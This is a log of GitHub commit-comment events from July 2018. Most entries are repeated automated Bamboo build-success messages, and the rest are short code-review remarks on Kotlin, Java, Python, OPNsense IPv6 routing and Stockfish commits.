{"id":"7934381139","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634556,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-08T18:32:42Z","updated_at":"2018-07-08T18:32:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:32:42Z"}
{"id":"7934381204","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634557,"position":47,"line":47,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/EditionsViewHolder.kt","commit_id":"f46c2efbd64d81d9a6459b641355f5a9396399c0","created_at":"2018-07-08T18:32:44Z","updated_at":"2018-07-08T18:32:44Z","author_association":"OWNER","body":"Можно даже `const` воткнуть - это приватная статическая константа."}},"created_at":"2018-07-08T18:32:44Z"}
{"id":"7934381569","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634558,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-08T18:33:01Z","updated_at":"2018-07-08T18:33:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:33:01Z"}
{"id":"7934382405","type":"CommitCommentEvent","actor":{"login":"Harvie"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29634559,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-08T18:33:38Z","updated_at":"2018-07-08T18:33:38Z","author_association":"CONTRIBUTOR","body":"@vlachoudis is there problem with numpy in python3? anyway. just found that math library has radians() which does exactly the same as deg2rad() from numpy. So i replaced it in my plugins..."}},"created_at":"2018-07-08T18:33:38Z"}
{"id":"7934382427","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634560,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-08T18:33:39Z","updated_at":"2018-07-08T18:33:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:33:39Z"}
{"id":"7934382491","type":"CommitCommentEvent","actor":{"login":"surbas"},"repo":{"name":"bigcommerce/hello-world-app-python-flask"},"payload":{"comment":{"id":29634561,"position":null,"line":null,"path":null,"commit_id":"5c09b14f0e3802b5f5921706208c4181b49418d1","created_at":"2018-07-08T18:33:42Z","updated_at":"2018-07-08T18:33:42Z","author_association":"NONE","body":"Removing this was a mistake. Flask-SQLAlchemy==2.2  "}},"created_at":"2018-07-08T18:33:42Z"}
{"id":"7934382697","type":"CommitCommentEvent","actor":{"login":"orioncompany"},"repo":{"name":"jollyroger222/gb"},"payload":{"comment":{"id":29634562,"position":14,"line":14,"path":"java2-dz2/src/dz2.java","commit_id":"cb76f40ad14ef1c67d15ad5d1d65b2fce018df87","created_at":"2018-07-08T18:33:50Z","updated_at":"2018-07-08T18:33:50Z","author_association":"NONE","body":"Необходимо использовать пакеты - классы в руте это не очень правильно."}},"created_at":"2018-07-08T18:33:50Z"}
{"id":"7934382762","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634563,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-08T18:33:53Z","updated_at":"2018-07-08T18:33:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:33:53Z"}
{"id":"7934383232","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634564,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-08T18:34:12Z","updated_at":"2018-07-08T18:34:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:34:12Z"}
{"id":"7934383407","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634565,"position":61,"line":68,"path":"app/src/main/kotlin/ru/fantlab/android/ui/modules/work/editions/WorkEditionsFragment.kt","commit_id":"f46c2efbd64d81d9a6459b641355f5a9396399c0","created_at":"2018-07-08T18:34:19Z","updated_at":"2018-07-08T18:34:19Z","author_association":"OWNER","body":"Здесь может покрешиться - `editionsBlocks` не зря объявлен nullable. Если придет null, упадет с KotlinNullPointerException."}},"created_at":"2018-07-08T18:34:19Z"}
{"id":"7934383472","type":"CommitCommentEvent","actor":{"login":"Mesqualito"},"repo":{"name":"Mesqualito/weddingplaner"},"payload":{"comment":{"id":29634566,"position":null,"line":null,"path":null,"commit_id":"00550fca221170c1b76e55304212894f6869a8a5","created_at":"2018-07-08T18:34:22Z","updated_at":"2018-07-08T18:34:22Z","author_association":"OWNER","body":"false commit message! Right commit message is: \" ExtraUser-Object automatically inserted as \"from\" when creating a Message-Object.\""}},"created_at":"2018-07-08T18:34:22Z"}
{"id":"7934384101","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634567,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-08T18:34:47Z","updated_at":"2018-07-08T18:34:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:34:47Z"}
{"id":"7934384207","type":"CommitCommentEvent","actor":{"login":"orioncompany"},"repo":{"name":"jollyroger222/gb"},"payload":{"comment":{"id":29634568,"position":72,"line":65,"path":"java2-dz2/src/dz2.java","commit_id":"cb76f40ad14ef1c67d15ad5d1d65b2fce018df87","created_at":"2018-07-08T18:34:50Z","updated_at":"2018-07-08T18:34:50Z","author_association":"NONE","body":"Литералы лучше выносить в константы с красивым понятным названием. Магическая цифра 4 не говорит ничего о своей сути."}},"created_at":"2018-07-08T18:34:50Z"}
{"id":"7934384469","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634569,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-08T18:35:03Z","updated_at":"2018-07-08T18:35:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:35:03Z"}
{"id":"7934385054","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634570,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-08T18:35:25Z","updated_at":"2018-07-08T18:35:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:35:25Z"}
{"id":"7934385575","type":"CommitCommentEvent","actor":{"login":"NickolasReynolds"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29634571,"position":null,"line":null,"path":null,"commit_id":"8288a82b401a883af6b35c19f5b51e4067090e7e","created_at":"2018-07-08T18:35:49Z","updated_at":"2018-07-08T18:35:49Z","author_association":"NONE","body":"Retest this idea after fixing \"rooDepth\" typo?"}},"created_at":"2018-07-08T18:35:49Z"}
{"id":"7934385701","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634573,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-08T18:35:54Z","updated_at":"2018-07-08T18:35:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:35:54Z"}
{"id":"7934385712","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29634574,"position":772,"line":957,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T18:35:55Z","updated_at":"2018-07-08T18:35:55Z","author_association":"NONE","body":"So here with my /28 SP ipv6 prefix, and the /0 ipv4 mask (reads my CE ipv6 prefix contains the whole ipv4), I should have a /60 prefixlen for my local ipv6 subnet. And it displays /28. So I thinnk the computation of prefixlen is wrong. I guess it works because all my local ipv6 are inside the /28.\r\nHowever, this means the whole /28 of the SP is considered \"in my local network\" (confirmed via netstat -nr I do have a link route with the /28 prefix) which is incorrect and should be routed through the ipv6 default gateway.\r\nThis might affect me if I try to send packets to another swisscom customer via ipv6. I know someone, so I might be able to test a few things."}},"created_at":"2018-07-08T18:35:55Z"}
{"id":"7934386173","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634577,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-08T18:36:15Z","updated_at":"2018-07-08T18:36:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:36:15Z"}
{"id":"7934386715","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634579,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-08T18:36:38Z","updated_at":"2018-07-08T18:36:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:36:38Z"}
{"id":"7934386807","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29634580,"position":null,"line":null,"path":null,"commit_id":"533a7cb6c974de93c55b224ada55035db65ec1b8","created_at":"2018-07-08T18:36:42Z","updated_at":"2018-07-08T18:36:42Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Настроить приложение](https://trello.com/c/DZHOBQ3N/17-%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D1%8C-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5)"}},"created_at":"2018-07-08T18:36:42Z"}
{"id":"7934386811","type":"CommitCommentEvent","actor":{"login":"Harvie"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29634581,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-08T18:36:42Z","updated_at":"2018-07-08T18:36:42Z","author_association":"CONTRIBUTOR","body":"BTW i would preffer to have python2 bCNC with OpenGL renderer and free rotating view to having python3 bCNC without it. I guess the amount of effort might be similar :-) Sometimes it's quite hard to decipher what i am looking at from the fixed views. especially when something goes wrong in the code..."}},"created_at":"2018-07-08T18:36:42Z"}
{"id":"7934387008","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kenrube/FantLab-client"},"payload":{"comment":{"id":29634583,"position":88,"line":88,"path":"app/src/main/res/layouts/row_layouts/layout/work_edition_row_item.xml","commit_id":"f46c2efbd64d81d9a6459b641355f5a9396399c0","created_at":"2018-07-08T18:36:51Z","updated_at":"2018-07-08T18:36:51Z","author_association":"OWNER","body":"Лучше закомментированный код/ресурсы сразу выпиливать - они не то чтоб сильно нужны, на это история гита и таски в репе есть."}},"created_at":"2018-07-08T18:36:51Z"}
{"id":"7934387311","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634585,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-08T18:37:02Z","updated_at":"2018-07-08T18:37:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:37:02Z"}
{"id":"7934387494","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29634586,"position":772,"line":957,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T18:37:12Z","updated_at":"2018-07-08T18:37:12Z","author_association":"MEMBER","body":"Can you check my comment at https://github.com/opnsense/core/issues/2521#issuecomment-403305590 it might be the wrong prefixlen for the IPv6 prefix"}},"created_at":"2018-07-08T18:37:12Z"}
{"id":"7934387825","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634587,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-08T18:37:26Z","updated_at":"2018-07-08T18:37:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:37:26Z"}
{"id":"7934388290","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29634588,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-08T18:37:47Z","updated_at":"2018-07-08T18:37:47Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/tree/master/test"}},"created_at":"2018-07-08T18:37:47Z"}
{"id":"7934388364","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634590,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-08T18:37:50Z","updated_at":"2018-07-08T18:37:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:37:50Z"}
{"id":"7934388502","type":"CommitCommentEvent","actor":{"login":"keshav2010"},"repo":{"name":"keshav2010/RGBNinja"},"payload":{"comment":{"id":29634591,"position":null,"line":null,"path":null,"commit_id":"4e3f5016f203cd071f880d88e4e289cf6b00cd4d","created_at":"2018-07-08T18:37:57Z","updated_at":"2018-07-08T18:37:57Z","author_association":"OWNER","body":"apart from the socket.io changes, instead of using .hide() jquery method, im now using .addClass(\"hide\") considering the fact that we might want to display overlays again, and by using .addClass(\"hide\"), we can use existing removeClass('hide') code instead of switching to .show() jquery method"}},"created_at":"2018-07-08T18:37:57Z"}
{"id":"7934388596","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29634592,"position":null,"line":null,"path":null,"commit_id":"8288a82b401a883af6b35c19f5b51e4067090e7e","created_at":"2018-07-08T18:38:02Z","updated_at":"2018-07-08T18:38:02Z","author_association":"OWNER","body":"It is in the version under test (otherwise it would not compile) "}},"created_at":"2018-07-08T18:38:02Z"}
{"id":"7934388692","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634593,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-08T18:38:07Z","updated_at":"2018-07-08T18:38:07Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-08T18:38:07Z"}
{"id":"7934388799","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634594,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-08T18:38:11Z","updated_at":"2018-07-08T18:38:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:38:11Z"}
{"id":"7934389297","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"chrmhoffmann/proprietary_vendor_fairphone"},"payload":{"comment":{"id":29634596,"position":null,"line":null,"path":null,"commit_id":"81c54cd6a63b0d01c34280e79e6ac3b6e47b1e91","created_at":"2018-07-08T18:38:33Z","updated_at":"2018-07-08T18:38:33Z","author_association":"NONE","body":"you didn't remove libqomx_core.so"}},"created_at":"2018-07-08T18:38:33Z"}
{"id":"7934389368","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29634597,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-08T18:38:36Z","updated_at":"2018-07-08T18:38:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T18:38:36Z"}
